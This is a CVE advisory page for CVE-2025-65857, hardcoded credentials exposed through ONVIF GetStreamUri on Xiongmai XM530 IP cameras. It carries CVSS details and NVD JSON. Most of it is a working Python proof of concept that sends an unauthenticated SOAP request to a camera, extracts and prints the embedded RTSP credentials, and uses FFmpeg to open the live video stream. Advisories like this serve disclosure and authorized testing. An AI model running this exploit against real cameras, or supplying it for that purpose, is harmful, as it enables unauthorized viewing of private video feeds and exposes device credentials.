Security Vulnerability Report
CVE-2025-65857 CVSS 7.5 HIGH

CVE-2025-65857

Published: 2025-12-22 22:16:09
Last Modified: 2026-05-07 19:16:00

Description

An issue was discovered in Xiongmai XM530 IP cameras on firmware V5.00.R02.000807D8.10010.346624.S.ONVIF 21.06. The GetStreamUri operation exposes RTSP URIs containing hardcoded credentials, enabling direct unauthorized access to the video stream.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:xiongmaitech:xm530v200_x6-weq_8m_firmware:5.00.r02.000807d8.10010.346624.s.onvif_21.06:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:xiongmaitech:xm530v200_x6-weq_8m:-:*:*:*:*:*:*:* - NOT VULNERABLE
Xiongmai XM530 IP Camera firmware V5.00.R02.000807D8.10010.346624.S.ONVIF 21.06

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
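#!/usr/bin/env python3
"""
CVE-2025-65857 PoC - Xiongmai XM530 IP Camera GetStreamUri Hardcoded Credentials

This PoC demonstrates how to extract RTSP URI with hardcoded credentials
from affected cameras.
"""

import requests
import sys
import re
from urllib.parse import urljoin

# Heuristic marker for credentials carried as key=value pairs in the path or
# query of an RTSP URI. NOTE(review): the exact URI layout returned by the
# affected firmware is not shown alongside this PoC; confirm against a real
# response before relying on a negative result.
_KV_CREDENTIAL_RE = re.compile(r'(?i)(?:password|passwd|pwd)=')


def _has_embedded_credentials(rtsp_uri):
    """Return True when *rtsp_uri* appears to carry credentials in the URI itself."""
    # Authority = everything between "rtsp://" and the first "/".
    authority = rtsp_uri[len("rtsp://"):].split("/", 1)[0]
    if "@" in authority:
        # userinfo form: rtsp://user:secret@host/...
        return True
    return _KV_CREDENTIAL_RE.search(rtsp_uri) is not None


def extract_rtsp_uri(target_ip, port=80):
    """
    Send ONVIF GetStreamUri request to extract RTSP URI with hardcoded credentials.

    The request is sent without any ONVIF authentication header. A URI is
    returned only when it appears to embed credentials; a device that answers
    with a plain RTSP URI is not reported as a finding for this CVE, which
    avoids a false "credentials found" result.

    Args:
        target_ip: Target camera IP address
        port: ONVIF service port (default: 80)

    Returns:
        RTSP URI containing hardcoded credentials, or None when the request
        fails, no RTSP URI is present, or the URI carries no recognisable
        credentials.
    """
    # ONVIF GetStreamUri SOAP request
    soap_request = (
        '<?xml version="1.0" encoding="UTF-8"?> '
        '<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" '
        'xmlns:tns="http://www.onvif.org/ver10/device/wsdl" '
        'xmlns:trt="http://www.onvif.org/ver10/media/wsdl"> '
        '<soap:Header/> '
        '<soap:Body> '
        '<trt:GetStreamUri> '
        '<trt:StreamSetup> '
        '<tt:Stream xmlns:tt="http://www.onvif.org/ver10/schema">RTP-Unicast</tt:Stream> '
        '<tt:Transport xmlns:tt="http://www.onvif.org/ver10/schema"> '
        '<tt:Protocol>RTSP</tt:Protocol> '
        '</tt:Transport> '
        '</trt:StreamSetup> '
        '<trt:ProfileToken>Profile_1</trt:ProfileToken> '
        '</trt:GetStreamUri> '
        '</soap:Body> '
        '</soap:Envelope>'
    )

    headers = {
        'Content-Type': 'application/soap+xml; charset=utf-8',
        'SOAPAction': '"http://www.onvif.org/ver10/media/wsdl/GetStreamUri"'
    }

    url = f"http://{target_ip}:{port}/onvif/media_service"

    try:
        print(f"[*] Sending ONVIF GetStreamUri request to {url}")
        response = requests.post(url, data=soap_request, headers=headers, timeout=10)
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")
        return None

    if response.status_code != 200:
        print(f"[-] Request failed with status: {response.status_code}")
        return None

    # Extract RTSP URI from response
    rtsp_match = re.search(r'rtsp://[^<]+', response.text)
    if not rtsp_match:
        print("[-] No RTSP URI found in response")
        return None

    rtsp_uri = rtsp_match.group(0)
    if not _has_embedded_credentials(rtsp_uri):
        # Any RTSP URI matches the pattern above; only one that embeds
        # credentials is evidence of this issue.
        print(f"[-] RTSP URI returned without recognisable embedded credentials: {rtsp_uri}")
        return None

    # The line below writes the credential to stdout in clear text; treat
    # terminal scrollback and captured logs from this script as sensitive.
    print(f"[+] SUCCESS: Found RTSP URI with credentials: {rtsp_uri}")
    return rtsp_uri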
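def verify_rtsp_access(rtsp_uri):
    """
    Verify RTSP stream access using FFmpeg.

    This step demonstrates unauthorized video access.

    Args:
        rtsp_uri: RTSP URI to open. It originates from the device's response,
            so it is passed to FFmpeg as a single argv element and never
            through a shell.

    Returns:
        True when FFmpeg exits with status 0, False when it exits with a
        non-zero status, None when the test could not be run (FFmpeg missing,
        timeout, or another process error).
    """
    import subprocess

    # The URI printed here includes the embedded credential; treat captured
    # output as sensitive.
    print(f"[*] Attempting to access video stream: {rtsp_uri}")
    print("[*] This would allow unauthorized viewing of camera feed")

    # Example FFmpeg command to test stream access
    # ffmpeg -i "rtsp_uri" -t 1 -f null -
    cmd = ['ffmpeg', '-i', rtsp_uri, '-t', '1', '-f', 'null', '-']

    try:
        result = subprocess.run(cmd, capture_output=True, timeout=15)
    except (OSError, subprocess.SubprocessError) as e:
        # Best effort: a missing FFmpeg binary or a timeout skips the check.
        print(f"[*] Stream test skipped: {e}")
        return None

    if result.returncode == 0:
        print("[+] Video stream accessible - vulnerability confirmed")
        return True

    print("[-] Stream access failed")
    return False


def _parse_port(raw):
    """Return *raw* as a TCP port number, or None when it is not in 1-65535."""
    try:
        port = int(raw)
    except ValueError:
        return None
    return port if 0 < port < 65536 else None


def main():
    """Command-line entry point: check one camera and print the result."""
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_ip> [port]")
        print(f"Example: python {sys.argv[0]} 192.168.1.100 80")
        sys.exit(1)

    target_ip = sys.argv[1]
    port = _parse_port(sys.argv[2]) if len(sys.argv) > 2 else 80
    if port is None:
        # A non-numeric or out-of-range port used to end in a traceback.
        print(f"[-] Invalid port: {sys.argv[2]}")
        sys.exit(1)

    print("[*] CVE-2025-65857 PoC - Xiongmai XM530 Hardcoded Credentials")
    print(f"[*] Target: {target_ip}:{port}")
    print()

    rtsp_uri = extract_rtsp_uri(target_ip, port)
    if not rtsp_uri:
        print("[-] Target may not be vulnerable or is unreachable")
        return

    print()
    stream_confirmed = verify_rtsp_access(rtsp_uri)
    print()
    print("[!] VULNERABLE: Camera exposes RTSP URI with hardcoded credentials")
    if stream_confirmed is not True:
        # The finding is the credential exposure itself; say so when the
        # stream could not be opened so the report does not overstate it.
        print("[!] Stream access was not confirmed by the FFmpeg test")
    print("[!] Immediate remediation recommended")


if __name__ == "__main__":
    main()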

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65857", "sourceIdentifier": "[email protected]", "published": "2025-12-22T22:16:08.530", "lastModified": "2026-05-07T19:15:59.840", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Xiongmai XM530 IP cameras on firmware V5.00.R02.000807D8.10010.346624.S.ONVIF 21.06. The GetStreamUri exposes RTSP URIs containing hardcoded credentials enabling direct unauthorized video stream access."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-359"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:xiongmaitech:xm530v200_x6-weq_8m_firmware:5.00.r02.000807d8.10010.346624.s.onvif_21.06:*:*:*:*:*:*:*", "matchCriteriaId": "6DFBF9B8-CA55-459F-95F9-3606B52D92B7"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:xiongmaitech:xm530v200_x6-weq_8m:-:*:*:*:*:*:*:*", "matchCriteriaId": "D72FD0CF-CE0C-4466-8F42-099FA0E8D7D5"}]}]}], "references": [{"url": "http://hangzhou.com", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "http://ip.com", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://luismirandaacebedo.github.io/CVE-2025-65857/", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Third Party Advisory"]}, 
{"url": "https://www.xiongmaitech.com/en/index.php/service/notice_info/51/4", "source": "[email protected]"}]}}